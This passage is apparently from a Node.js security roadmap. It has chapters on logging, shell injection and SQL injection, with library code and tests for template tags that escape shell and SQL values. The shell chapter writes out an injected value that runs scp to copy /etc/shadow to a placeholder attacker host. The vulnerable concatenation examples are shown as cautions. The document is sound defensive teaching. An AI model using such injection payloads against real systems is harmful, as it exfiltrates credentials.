71 | Incident responders would have the tools necessary to do their jobs if 72 | 73 | * Security specialists can subscribe to a stream of notifications 74 | that include the vast majority of actionable security disclosures. 75 | * Responders can narrow down which code generated which log entries. 76 | 77 | 78 | ## Possible solutions 79 | 80 | ### Naming 81 | 82 | Use CVE-IDs if at all possible when disclosing a vulnerability. There 83 | is a CNA for Node.js but that doesn't cover non-core npm modules and 84 | other CNAs cover runtime dependencies like OpenSSL. If there is no 85 | other CNA that is appropriate, MITRE will issue an ID.
86 | 87 | ### Logging 88 | 89 | On module load, the builtin `module.js` creates a new version of 90 | `require` for each module so that it can make sure that the module path 91 | gets passed as the module parent parameter. 92 | 93 | The same mechanism could create a distinct `console` logger for each 94 | module that narrows down the source of a message, and makes it 95 | unambiguous where one message ends and the next starts. For example: 96 | 97 | 1. Replace all `/\r\n?/g` in the log message text with `'\n'` 98 | and emit a CRLF after the log message to prevent forgery by 99 | line splitting. 100 | 2. Prefix it with the module filename and a colon. 101 | 102 | With this, an incident responder reading a log message can reliably 103 | tell that the module mentioned is where the log message originated, as 104 | long as the attacker didn't get write access to the log file. 105 | Preventing log deletion by other processes is better handled by 106 | Linux's `FS_APPEND_FL` and similar mechanisms than in node. 107 | 108 | [nodesecurity]: https://nodesecurity.io/advisories 109 | [github graph]: https://github.com/blog/2447-a-more-connected-universe 110 | [snyk]: https://snyk.io/vuln?packageManager=npm 111 | [nodejs-sec]: https://groups.google.com/group/nodejs-sec 112 | [CVE-IDs]: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures#CVE_identifiers 113 | [log injection]: https://www.owasp.org/index.php/Log_Injection 114 | [0DY]: ../chapter-1/threats.md 115 | [SANS]: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901 116 | [security-wg]: https://github.com/nodejs/security-wg 117 | -------------------------------------------------------------------------------- /chapter-7/child-processes.md: -------------------------------------------------------------------------------- 1 | # Shell injection 2 | 3 | Threats: [SHP][] 4 | 5 | The [`shelljs` module][shelljs] allows access to the system 6 | shell. 
We focus on `shelljs`, but similar arguments apply to builtins 7 | like `child_process.spawn(cmd, { shell: ... })` ([docs][cp.spawn]) and 8 | similar modules. 9 | 10 | `shelljs` has some nice programmatic APIs for common shell commands 11 | that escape arguments. 12 | 13 | It also provides `shell.exec` which allows full access to the shell 14 | including interpretation of shell meta characters. 15 | 16 | Solving [shell injection][SHP] is a much harder problem than query 17 | injection since shell scripts tend to call other shell scripts, so 18 | properly escaping arguments to one script doesn't help if the script 19 | sloppily composes a sub-shell. The problem of tools that trust their 20 | inputs is not limited to shell scripts: see discussion of image decoders 21 | in [BOF][]. 22 | 23 | The [shell grammar][] has more layers of interpretation so is arguably 24 | more complex than any one SQL grammar. 25 | 26 | We can do much better than string concatenation though. The code 27 | below is vulnerable. 28 | 29 | ```js 30 | shelljs.exec("executable '" + x + "'") 31 | ``` 32 | 33 | If an attacker causes 34 | 35 | ```js 36 | x = " '; scp /etc/shadow evil@evil.org/; echo ' "; 37 | ``` 38 | 39 | then what gets passed to the shell is 40 | 41 | ```js 42 | executable ' '; scp /etc/shadow evil@evil.org/; echo ' ' 43 | ``` 44 | 45 | Instead, consider: 46 | 47 | ```js 48 | shelljs.exec`executable ${x}` 49 | 50 | shelljs.exec`executable '${x}'` 51 | ``` 52 | 53 | This use of tagged templates is roughly equivalent to 54 | 55 | ```js 56 | shelljs.exec(["executable ", ""], x) 57 | 58 | shelljs.exec(["executable \'", "\'"], x) 59 | ``` 60 | 61 | This way, when control reaches `shelljs`, it knows which strings came 62 | from the developer: `["executable ", ""]`, and which are inline 63 | expressions: `x`. If `shelljs` properly escapes the latter, it 64 | prevents the breach above. 
65 | 66 | The accompanying example ([code][sh-code]) includes a tag 67 | implementation for `sh` and `bash` that recognizes complex nesting 68 | semantics. 69 | 70 | We can't, working within the confines of Node, prevent poorly written 71 | command line tools from breaking when exposed to untrusted inputs, but 72 | we can make sure that we preserve the developer's intent when they 73 | write code that invokes command line tools. For projects that have 74 | legitimate reasons for invoking sub-shells, consistently using 75 | template tags like this solves some problems and makes it more likely 76 | that effort spent hardening command line tools will yield fruit. 77 | 78 | [shell grammar]: http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_10 79 | [shelljs]: https://www.npmjs.com/package/shelljs 80 | [cp.spawn]: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options 81 | [SHP]: ../chapter-1/threat-SHP.md 82 | [BOF]: ../chapter-1/threat-BOF.md 83 | [sh-code]: https://github.com/mikesamuel/sh-template-tag 84 | -------------------------------------------------------------------------------- /chapter-7/examples/sh/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sh-template-tag", 3 | "description": "string template tags for safely composing shell strings", 4 | "keywords": [ 5 | "shell", 6 | "child_process", 7 | "security", 8 | "injection", 9 | "template", 10 | "template-tag", 11 | "string-template", 12 | "sec-roadmap", 13 | "es6" 14 | ], 15 | "version": "0.0.0", 16 | "author": "Mike Samuel", 17 | "license": "Apache-2.0", 18 | "main": "index.js", 19 | "files": [ 20 | "index.js" 21 | ], 22 | "dependencies": { 23 | "template-tag-common": ">=1.0.2" 24 | }, 25 | "devDependencies": { 26 | "chai": ">=4.1.2", 27 | "eslint": ">=4.15.0", 28 | "eslint-config-strict": "*", 29 | "eslint-config-standard": "*", 30 | "mocha": ">=4.0.1", 31 | "standard": 
"*" 32 | }, 33 | "scripts": { 34 | "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && ./node_modules/.bin/mocha" 35 | }, 36 | "eslintConfig": { 37 | "extends": [ 38 | "strict", 39 | "standard" 40 | ] 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /chapter-7/examples/sh/test/test.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | /* eslint "id-length": off */ 19 | 20 | const { expect } = require('chai') 21 | const { describe, it } = require('mocha') 22 | const { sh, ShFragment, makeLexer } = require('../index') 23 | 24 | /** 25 | * Feeds chunks to the lexer and concatenates contexts. 26 | * Tests that the lexer ends in a valid end state and 27 | * appends '_ERR_' as an end state if not. 28 | */ 29 | function tokens (...chunks) { 30 | const lexer = makeLexer() 31 | const out = [] 32 | for (let i = 0, len = chunks.length; i < len; ++i) { 33 | out.push(lexer(chunks[i])[0] || '_') 34 | } 35 | try { 36 | lexer(null) 37 | } catch (exc) { 38 | out.push('_ERR_') 39 | } 40 | return out.join(',') 41 | } 42 | 43 | // Unwrap an ShFragment, failing if the result is not one. 
44 | function unwrap (x) { 45 | if (x instanceof ShFragment) { 46 | return String(x) 47 | } 48 | throw new Error(`Expected ShFragment not ${JSON.stringify(x)}`) 49 | } 50 | 51 | // Run a test multiply to exercise the memoizing code. 52 | function runShTest (golden, test) { 53 | for (let i = 3; --i >= 0;) { 54 | if (golden === '_ERR_') { 55 | expect(test).to.throw() 56 | } else { 57 | expect(unwrap(test())).to.equal(golden) 58 | } 59 | } 60 | } 61 | 62 | describe('sh template tags', () => { 63 | describe('lexer', () => { 64 | it('empty string', () => { 65 | expect(tokens('')).to.equal('_') 66 | }) 67 | it('word', () => { 68 | expect(tokens('foo')).to.equal('_') 69 | }) 70 | it('words', () => { 71 | expect(tokens('foo bar baz')).to.equal('_') 72 | }) 73 | it('words split', () => { 74 | expect(tokens('foo bar', ' ', 'baz')).to.equal('_,_,_') 75 | }) 76 | it('parens', () => { 77 | expect(tokens('foo (bar) baz')).to.equal('_') 78 | }) 79 | it('parens split', () => { 80 | expect('_,_,(,_,_,_').to.equal( 81 | tokens('foo', ', ', '(bar', ')', ' ', 'baz')) 82 | }) 83 | it('parens hanging split', () => { 84 | expect('_,_,(,(,(,_ERR_').to.equal( 85 | tokens('foo', ', ', '(bar', ' ', 'baz')) 86 | }) 87 | it('quotes embed subshell', () => { 88 | expect('",$(,_').to.equal( 89 | tokens(' "foo', '$(bar ', ' baz)" boo')) 90 | }) 91 | it('quotes embed arithshell', () => { 92 | expect('",$((,$((,",_').to.equal( 93 | tokens(' "foo', '$((bar ', '(far)', ' baz))', 'q" boo')) 94 | }) 95 | it('quotes embed backticks', () => { 96 | expect('",`,`,",_').to.equal( 97 | tokens(' "foo', '`bar ', '(far)', ' baz`', 'q" boo')) 98 | }) 99 | it('escape affects subshell', () => { 100 | expect('",",",",_').to.equal( 101 | tokens(' "foo', '\\$((bar ', '(far)', ' baz))', 'q" boo')) 102 | }) 103 | it('single quotes do not embed', () => { 104 | expect(`',',',',_`).to.equal( 105 | tokens( 106 | ' \' $(', 107 | 'foo) $((', 108 | 'bar))', 109 | ' `', 110 | ' ` # \' ')) 111 | }) 112 | it('unterminated 
comment', () => { 113 | expect('#,_ERR_').to.equal( 114 | tokens(' #foo')) 115 | }) 116 | it('terminated comment', () => { 117 | expect('_').to.equal( 118 | tokens(' #foo\n')) 119 | }) 120 | it('terminated comment split', () => { 121 | expect('#,_').to.equal( 122 | tokens(' #foo', 'bar\n')) 123 | }) 124 | it('arithshell', () => { 125 | expect('_,$((,$((,_,_').to.equal( 126 | tokens('foo', ' $((bar ', '(far)', ' baz))', ' boo')) 127 | }) 128 | it('backticks', () => { 129 | expect('_,`,`,_,_').to.equal( 130 | tokens('foo', '`bar ', '(far)', ' baz`', ' boo')) 131 | }) 132 | it('subshell paren disambiguation', () => { 133 | expect('$(,(,$(,",_,_').to.equal(tokens( 134 | 'echo "$(foo ', ' | (bar ', ' baz)', ' boo)', 'far" | ', '')) 135 | }) 136 | it('hash not after space', () => { 137 | expect('_,_').to.equal( 138 | tokens('echo foo#', '')) 139 | }) 140 | it('hash after space', () => { 141 | expect('#,#,_ERR_').to.equal( 142 | tokens('echo foo #', '')) 143 | }) 144 | it('hash concatenation hazard', () => { 145 | expect(() => tokens('#foo')).to.throw() 146 | }) 147 | it('intermediate concatenation hazard', () => { 148 | expect(() => tokens('echo foo', '#bar')).to.throw() 149 | }) 150 | it('escaped intermediate concatenation hazard', () => { 151 | expect('_,_').to.equal(tokens( 152 | 'echo foo', '\\#bar')) 153 | }) 154 | it('simple heredoc', () => { 155 | expect(tokens('cat < { 158 | // Concatenation hazard when no eol at end 159 | expect(tokens('cat < { 162 | expect(tokens('cat < { 165 | expect(tokens('cat << EOF\nFoo', ' bar\nEOF\n')).to.equal('< { 168 | expect(tokens('cat <<-EOF\nFoo', ' bar\nEOF\n')).to.equal('<<-EOF,_') 169 | }) 170 | it('bad heredoc label', () => { 171 | expect(() => tokens('cat << "EOF"\nFoo bar\nEOF;')).to.throw() 172 | }) 173 | it('missing heredoc label', () => { 174 | expect(() => tokens('cat <<', '\nfoo bar\n', ';')).to.throw() 175 | }) 176 | }) 177 | 178 | const str = 'a"\'\n\\$b' 179 | const numb = 1234 180 | const frag = new ShFragment(' 
frag ') 181 | describe('template tag', () => { 182 | it('string in top level', () => { 183 | runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo ${str}`) 184 | }) 185 | it('number in top level', () => { 186 | runShTest(`echo '1234'`, () => sh`echo ${numb}`) 187 | }) 188 | it('fragment in top level', () => { 189 | runShTest(`echo frag `, () => sh`echo ${frag}`) 190 | }) 191 | it('string in dq', () => { 192 | runShTest(`echo "a\\"'\n\\\\\\$b"`, () => sh`echo "${str}"`) 193 | }) 194 | it('number in dq', () => { 195 | runShTest(`echo "1234"`, () => sh`echo "${numb}"`) 196 | }) 197 | it('fragment in dq', () => { 198 | runShTest(`echo " frag "`, () => sh`echo "${frag}"`) 199 | }) 200 | it('string in sq', () => { 201 | runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo '${str}'`) 202 | }) 203 | it('number in sq', () => { 204 | runShTest(`echo '1234'`, () => sh`echo '${numb}'`) 205 | }) 206 | it('fragment in sq', () => { 207 | runShTest(`echo ' frag '`, () => sh`echo '${frag}'`) 208 | }) 209 | it('string in embed', () => { 210 | runShTest( 211 | `echo $(echo 'a"'"'"'\n\\$b')`, 212 | () => sh`echo $(echo ${str})`) 213 | }) 214 | it('number in embed', () => { 215 | runShTest( 216 | `echo $(echo '1234')`, 217 | () => sh`echo $(echo ${numb})`) 218 | }) 219 | it('fragment in embed', () => { 220 | runShTest( 221 | `echo $(echo frag )`, 222 | () => sh`echo $(echo ${frag})`) 223 | }) 224 | it('hash ambig string', () => { 225 | runShTest(`_ERR_`, () => sh`echo foo${str}#bar`) 226 | }) 227 | it('hash ambig fragment', () => { 228 | runShTest(`_ERR_`, () => sh`echo foo${frag}#bar`) 229 | }) 230 | it('heredoc string', () => { 231 | runShTest( 232 | '\ncat < sh` 234 | cat < { 240 | runShTest( 241 | '\ncat < sh` 243 | cat < { 249 | runShTest( 250 | '\ncat < sh` 252 | cat < { 258 | runShTest( 259 | ` 260 | cat < sh` 268 | cat < { 80 | if (errorMessage) { 81 | // Replay the error message if we've already failed. 
82 | throw new Error(errorMessage) 83 | } 84 | text = String(text) 85 | while (text) { 86 | const pattern = delimiter 87 | ? DELIMITED_BODIES[delimiter] 88 | : PREFIX_BEFORE_DELIMITER 89 | const match = pattern.exec(text) 90 | if (!match) { 91 | throw new Error( 92 | errorMessage = msg`Failed to lex starting at ${text}`) 93 | } 94 | let nConsumed = match[0].length 95 | if (text.length > nConsumed) { 96 | const chr = text.charAt(nConsumed) 97 | if (delimiter) { 98 | if (chr === delimiter) { 99 | delimiter = null 100 | ++nConsumed 101 | } else { 102 | throw new Error( 103 | errorMessage = msg`Expected ${chr} at ${text}`) 104 | } 105 | } else if (Object.hasOwnProperty.call(DELIMITED_BODIES, chr)) { 106 | delimiter = chr 107 | ++nConsumed 108 | } else { 109 | throw new Error( 110 | errorMessage = msg`Expected delimiter at ${text}`) 111 | } 112 | } 113 | text = text.substring(nConsumed) 114 | } 115 | return delimiter 116 | } 117 | } 118 | 119 | /** A string wrapper that marks its content as a SQL identifier. */ 120 | class Identifier extends TypedString {} 121 | 122 | /** 123 | * A string wrapper that marks its content as a series of 124 | * well-formed SQL tokens. 125 | */ 126 | class SqlFragment extends TypedString {} 127 | 128 | /** 129 | * Analyzes the static parts of the tag content. 130 | * 131 | * @return An record like { delimiters, chunks } 132 | * where delimiter is a contextual cue and chunk is 133 | * the adjusted raw text. 134 | */ 135 | function computeStatic (strings) { 136 | const { raw } = trimCommonWhitespaceFromLines(strings) 137 | 138 | const delimiters = [] 139 | const chunks = [] 140 | 141 | const lexer = makeLexer() 142 | 143 | let delimiter = null 144 | for (let i = 0, len = raw.length; i < len; ++i) { 145 | let chunk = String(raw[i]) 146 | if (delimiter === '`') { 147 | // Treat raw \` in an identifier literal as an ending delimiter. 
148 | chunk = chunk.replace(/^([^\\`]|\\[\s\S])*\\`/, '$1`') 149 | } 150 | const newDelimiter = lexer(chunk) 151 | if (newDelimiter === '`' && !delimiter) { 152 | // Treat literal \` outside a string context as starting an 153 | // identifier literal 154 | chunk = chunk.replace( 155 | /((?:^|[^\\])(?:\\\\)*)\\(`(?:[^`\\]|\\[\s\S])*)$/, '$1$2') 156 | } 157 | 158 | chunks.push(chunk) 159 | delimiters.push(newDelimiter) 160 | delimiter = newDelimiter 161 | } 162 | 163 | if (delimiter) { 164 | throw new Error(`Unclosed quoted string: ${delimiter}`) 165 | } 166 | 167 | return { raw, delimiters, chunks } 168 | } 169 | 170 | function interpolateSqlIntoFragment ( 171 | { raw, delimiters, chunks }, strings, values) { 172 | // A buffer to accumulate output. 173 | let [ result ] = chunks 174 | for (let i = 1, len = raw.length; i < len; ++i) { 175 | const chunk = chunks[i] 176 | // The count of values must be 1 less than the surrounding 177 | // chunks of literal text. 178 | if (i !== 0) { 179 | const delimiter = delimiters[i - 1] 180 | const value = values[i - 1] 181 | if (delimiter) { 182 | result += escapeDelimitedValue(value, delimiter) 183 | } else { 184 | result = appendValue(result, value, chunk) 185 | } 186 | } 187 | 188 | result += chunk 189 | } 190 | 191 | return new SqlFragment(result) 192 | } 193 | 194 | function escapeDelimitedValue (value, delimiter) { 195 | if (delimiter === '`') { 196 | return mysql.escapeId(String(value)).replace(/^`|`$/g, '') 197 | } 198 | const escaped = mysql.escape(String(value)) 199 | return escaped.substring(1, escaped.length - 1) 200 | } 201 | 202 | function appendValue (resultBefore, value, chunk) { 203 | let needsSpace = false 204 | let result = resultBefore 205 | const valueArray = Array.isArray(value) ? 
value : [ value ] 206 | for (let i = 0, nValues = valueArray.length; i < nValues; ++i) { 207 | if (i) { 208 | result += ', ' 209 | } 210 | 211 | const one = valueArray[i] 212 | let valueStr = null 213 | if (one instanceof SqlFragment) { 214 | if (!/(?:^|[\n\r\t ,\x28])$/.test(result)) { 215 | result += ' ' 216 | } 217 | valueStr = one.toString() 218 | needsSpace = i + 1 === nValues 219 | } else if (one instanceof Identifier) { 220 | valueStr = mysql.escapeId(one.toString()) 221 | } else { 222 | // If we need to handle nested arrays, we would recurse here. 223 | valueStr = mysql.format('?', one) 224 | } 225 | result += valueStr 226 | } 227 | 228 | if (needsSpace && chunk && !/^[\n\r\t ,\x29]/.test(chunk)) { 229 | result += ' ' 230 | } 231 | 232 | return result 233 | } 234 | 235 | /** 236 | * Template tag function that contextually autoescapes values 237 | * producing a SqlFragment. 238 | */ 239 | const sql = memoizedTagFunction(computeStatic, interpolateSqlIntoFragment) 240 | 241 | exports.Identifier = Identifier 242 | exports.SqlFragment = SqlFragment 243 | exports.sql = sql 244 | 245 | if (global.it) { 246 | // Expose for testing. 
247 | // Harmless if this leaks 248 | exports.makeLexer = makeLexer 249 | } 250 | -------------------------------------------------------------------------------- /chapter-7/examples/sql/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "mysql-template-tag", 3 | "description": "string template tags for safely composing SQL", 4 | "keywords": [ 5 | "sql", 6 | "security", 7 | "injection", 8 | "template", 9 | "template-tag", 10 | "string-template", 11 | "sec-roadmap", 12 | "es6" 13 | ], 14 | "version": "0.0.0", 15 | "author": "Mike Samuel", 16 | "license": "Apache-2.0", 17 | "main": "index.js", 18 | "files": [ 19 | "index.js" 20 | ], 21 | "dependencies": { 22 | "mysql": "2.15.0", 23 | "template-tag-common": ">=1.0.2" 24 | }, 25 | "devDependencies": { 26 | "chai": ">=4.1.2", 27 | "eslint": ">=4.15.0", 28 | "eslint-config-strict": "*", 29 | "eslint-config-standard": "*", 30 | "mocha": ">=4.0.1", 31 | "standard": "*" 32 | }, 33 | "scripts": { 34 | "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && TZ=GMT ./node_modules/.bin/mocha" 35 | }, 36 | "eslintConfig": { 37 | "extends": [ 38 | "strict", 39 | "standard" 40 | ] 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /chapter-7/examples/sql/test/test.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | /* eslint "no-magic-numbers": off */ 19 | 20 | const { expect } = require('chai') 21 | const { describe, it } = require('mocha') 22 | const index = require('../index') 23 | 24 | function tokens (...chunks) { 25 | const lexer = index.makeLexer() 26 | const out = [] 27 | for (let i = 0, len = chunks.length; i < len; ++i) { 28 | out.push(lexer(chunks[i]) || '_') 29 | } 30 | return out.join(',') 31 | } 32 | 33 | describe('sql template tags', () => { 34 | describe('lexer', () => { 35 | it('empty string', () => { 36 | expect(tokens('')).to.equal('_') 37 | }) 38 | it('hash comments', () => { 39 | expect(tokens(' # "foo\n', '')).to.equal('_,_') 40 | }) 41 | it('dash comments', () => { 42 | expect(tokens(' -- \'foo\n', '')).to.equal('_,_') 43 | }) 44 | it('block comments', () => { 45 | expect(tokens(' /* `foo */', '')).to.equal('_,_') 46 | }) 47 | it('dq', () => { 48 | expect(tokens('SELECT "foo"')).to.equal('_') 49 | expect(tokens('SELECT `foo`, "foo"')).to.equal('_') 50 | expect(tokens('SELECT "', '"')).to.equal('",_') 51 | expect(tokens('SELECT "x', '"')).to.equal('",_') 52 | expect(tokens('SELECT "\'', '"')).to.equal('",_') 53 | expect(tokens('SELECT "`', '"')).to.equal('",_') 54 | expect(tokens('SELECT """', '"')).to.equal('",_') 55 | expect(tokens('SELECT "\\"', '"')).to.equal('",_') 56 | }) 57 | it('sq', () => { 58 | expect(tokens('SELECT \'foo\'')).to.equal('_') 59 | expect(tokens('SELECT `foo`, \'foo\'')).to.equal('_') 60 | expect(tokens('SELECT \'', '\'')).to.equal('\',_') 61 | expect(tokens('SELECT \'x', '\'')).to.equal('\',_') 62 | expect(tokens('SELECT \'"', '\'')).to.equal('\',_') 63 | expect(tokens('SELECT \'`', '\'')).to.equal('\',_') 64 | expect(tokens('SELECT \'\'\'', '\'')).to.equal('\',_') 65 | expect(tokens('SELECT \'\\\'', '\'')).to.equal('\',_') 66 | }) 67 | it('bq', () => { 68 | expect(tokens('SELECT 
`foo`')).to.equal('_') 69 | expect(tokens('SELECT "foo", `foo`')).to.equal('_') 70 | expect(tokens('SELECT `', '`')).to.equal('`,_') 71 | expect(tokens('SELECT `x', '`')).to.equal('`,_') 72 | expect(tokens('SELECT `\'', '`')).to.equal('`,_') 73 | expect(tokens('SELECT `"', '`')).to.equal('`,_') 74 | expect(tokens('SELECT ```', '`')).to.equal('`,_') 75 | expect(tokens('SELECT `\\`', '`')).to.equal('`,_') 76 | }) 77 | }) 78 | 79 | function runTagTest (golden, test) { 80 | // Run multiply to test memoization bugs. 81 | for (let i = 3; --i >= 0;) { 82 | let result = test() 83 | if (result instanceof index.SqlFragment) { 84 | result = result.toString() 85 | } else { 86 | throw new Error(`Expected SqlFragment not ${result}`) 87 | } 88 | expect(result).to.equal(golden) 89 | } 90 | } 91 | 92 | describe('sql', () => { 93 | it('numbers', () => { 94 | runTagTest( 95 | 'SELECT 2', 96 | () => index.sql`SELECT ${1 + 1}`) 97 | }) 98 | it('date', () => { 99 | runTagTest( 100 | `SELECT '2000-01-01 00:00:00.000'`, 101 | () => index.sql`SELECT ${new Date(Date.UTC(2000, 0, 1, 0, 0, 0))}`) 102 | }) 103 | it('string', () => { 104 | runTagTest( 105 | `SELECT 'Hello, World!\\n'`, 106 | () => index.sql`SELECT ${'Hello, World!\n'}`) 107 | }) 108 | it('identifier', () => { 109 | runTagTest( 110 | 'SELECT `foo`', 111 | () => index.sql`SELECT ${new index.Identifier('foo')}`) 112 | }) 113 | it('fragment', () => { 114 | const fragment = new index.SqlFragment('1 + 1') 115 | runTagTest( 116 | `SELECT 1 + 1`, 117 | () => index.sql`SELECT ${fragment}`) 118 | }) 119 | it('fragment no token merging', () => { 120 | const fragment = new index.SqlFragment('1 + 1') 121 | runTagTest( 122 | `SELECT 1 + 1 FROM T`, 123 | () => index.sql`SELECT${fragment}FROM T`) 124 | }) 125 | it('string in dq string', () => { 126 | runTagTest( 127 | `SELECT "Hello, World!\\n"`, 128 | () => index.sql`SELECT "Hello, ${'World!'}\n"`) 129 | }) 130 | it('string in sq string', () => { 131 | runTagTest( 132 | `SELECT 'Hello, 
World!\\n'`, 133 | () => index.sql`SELECT 'Hello, ${'World!'}\n'`) 134 | }) 135 | it('string after string in string', () => { 136 | // The following tests check obliquely that '?' is not 137 | // interpreted as a prepared statement meta-character 138 | // internally. 139 | runTagTest( 140 | `SELECT 'Hello', "World?"`, 141 | () => index.sql`SELECT '${'Hello'}', "World?"`) 142 | }) 143 | it('string before string in string', () => { 144 | runTagTest( 145 | `SELECT 'Hello?', 'World?'`, 146 | () => index.sql`SELECT 'Hello?', '${'World?'}'`) 147 | }) 148 | it('number after string in string', () => { 149 | runTagTest( 150 | `SELECT 'Hello?', 123`, 151 | () => index.sql`SELECT '${'Hello?'}', ${123}`) 152 | }) 153 | it('number before string in string', () => { 154 | runTagTest( 155 | `SELECT 123, 'World?'`, 156 | () => index.sql`SELECT ${123}, '${'World?'}'`) 157 | }) 158 | it('string in identifier', () => { 159 | runTagTest( 160 | 'SELECT `foo`', 161 | () => index.sql`SELECT \`${'foo'}\``) 162 | }) 163 | it('number in identifier', () => { 164 | runTagTest( 165 | 'SELECT `foo_123`', 166 | () => index.sql`SELECT \`foo_${123}\``) 167 | }) 168 | it('array', () => { 169 | const id = new index.Identifier('foo') 170 | const frag = new index.SqlFragment('1 + 1') 171 | const values = [ 123, 'foo', id, frag ] 172 | runTagTest( 173 | "SELECT X FROM T WHERE X IN (123, 'foo', `foo`, 1 + 1)", 174 | () => index.sql`SELECT X FROM T WHERE X IN (${values})`) 175 | }) 176 | }) 177 | }) 178 | -------------------------------------------------------------------------------- /chapter-7/libraries.md: -------------------------------------------------------------------------------- 1 | # Library support for Safe Coding Practices 2 | 3 | The way we structure libraries and APIs affect the idioms that are 4 | available to developers. 
5 | 6 | If the easiest ways to express ideas are also secure against a 7 | particular class of attack, then developers who have seen ideas 8 | expressed those ways will tend to produce code that is secure 9 | against that class of attack. 10 | 11 | Next, we introduce a few such idioms, show how they can be better 12 | addressed via a rarely used but powerful JavaScript 13 | feature, and end with some ideas on how to foster consistent, 14 | powerful, and secure APIs for a class of problems that often have 15 | security consequences: composing structured strings to send to 16 | external agents. 17 | -------------------------------------------------------------------------------- /chapter-7/query-langs.md: -------------------------------------------------------------------------------- 1 | # Query injection 2 | 3 | Threats: [QUI][] 4 | 5 | One piece of simple advice to avoid [query injection attacks][QUI] is 6 | "just use [prepared statements][]." 7 | 8 | This is good advice, and the [`mysql`][] library has a 9 | solid, well-documented API for producing secure prepared statements. 10 | 11 | Developers could do 12 | 13 | ```js 14 | const mysql = require('mysql'); 15 | ... 16 | connection.query( 17 | 'SELECT * FROM T WHERE x = ?, y = ?, z = ?', 18 | [ x, y, z], 19 | callback); 20 | ``` 21 | 22 | which is secure since `.query` calls `mysql.format` under the hood 23 | to escape `x`, `y`, and `z`. Enough developers still do 24 | 25 | ```js 26 | connection.query( 27 | "SELECT * FROM T WHERE x = '" + x + "', y = '" + y + "', z='" + z + "'", 28 | callback); 29 | ``` 30 | 31 | to make query injection a real problem. 32 | 33 | 34 | Developers may not know about prepared statements, but prepared 35 | statements have other problems: 36 | 37 | * They rely on a **correspondence between positional parameters** 38 | and the '`?`' placeholders that they fill.
When a prepared statement 39 | has more substitutions than fit in a reader's working memory, the reader 40 | has to look back and forth between the prepared statement and the 41 | parameter list. 42 | * Prepared statements do not make it easy to **compose a query** from 43 | simpler query fragments. It's not easy to compute the `WHERE` 44 | clause separately from the result column set and then combine the 45 | two into a query without resorting to string concatenation 46 | somewhere along the line. 47 | 48 | 49 | ## Template literals 50 | 51 | JavaScript has a rarely used feature that lets us get the best of 52 | both worlds. 53 | 54 | 55 | ```js 56 | connection.query`SELECT * FROM T WHERE x = ${x}, y = ${y}, z = ${z}`(callback) 57 | ``` 58 | 59 | uses a [tagged template literal][] to allow inline expressions in SQL 60 | syntax. 61 | 62 | > A more advanced form of template literals are tagged template 63 | > literals. Tags allow you to parse template literals with a 64 | > function. The first argument of a tag function contains an array of 65 | > string values. The remaining arguments are related to the 66 | > expressions. In the end, your function can return your manipulated 67 | > string (or it can return something completely different ...). 68 | 69 | The code above is almost equivalent to 70 | 71 | ```js 72 | connection.query( 73 | ['SELECT * FROM T WHERE x = ', ', y = ', ', z = ', ''], 74 | x, y, z 75 | )(callback); 76 | ``` 77 | 78 | `connection.query` gets called with the parts of the static 79 | template string specified by the author, followed by the results of 80 | the expressions. The final `(callback)` dispatches the query. 81 | 82 | We can tweak SQL APIs so that, when used as template literal tags, 83 | they escape the dynamic parts to preserve the intent of the author of 84 | the static parts, and then re-interleave them to produce the query.
85 | 86 | The example ([code][sql-code]) accompanying this chapter implements 87 | this idea by defining a `mysql.sql` function that parses the static 88 | parts to choose appropriate escapers for the dynamic parts. 89 | We have put together a [draft PR][mysql-PR] to integrate this into 90 | the *mysql* module. 91 | 92 | It also provides string wrappers, `Identifier` and `SqlFragment`, to 93 | make it easy to compose complex queries from simpler parts: 94 | 95 | ```js 96 | // Compose a query from two fragments. 97 | // When the value inside ${...} is a SqlFragment, no extra escaping happens. 98 | connection.query` 99 | SELECT ${outputColumnsAndJoins(a, b, c)} 100 | WHERE ${rowFilter(x, y, z)} 101 | `(callback) 102 | 103 | // Returns a SqlFragment 104 | function rowFilter(x, y, z) { 105 | if (complexCondition) { 106 | // mysql.sql returns a SqlFragment 107 | return mysql.sql`X = ${x}`; 108 | } else { 109 | return mysql.sql`Y = ${y} AND Z=${z}`; 110 | } 111 | } 112 | 113 | function outputColumnsAndJoins(a, b, c) { 114 | return mysql.sql`...`; 115 | } 116 | ``` 117 | 118 | ---- 119 | 120 | Our goal was to make the easiest way to express an idea a secure way. 121 | 122 | As shown below, this template tag API is the shortest way to express 123 | this idea. It is also tolerant of small variations 124 | — the author may leave out quotes since the tag implementation 125 | knows whether a substitution is inside quotes. 126 | 127 | Shorter & tolerant != easier, but we hope that being shorter, more 128 | robust, more secure, and easy to compose will make it a good migration 129 | target for teams that realize they have a problem with SQL injection. 130 | We also hope 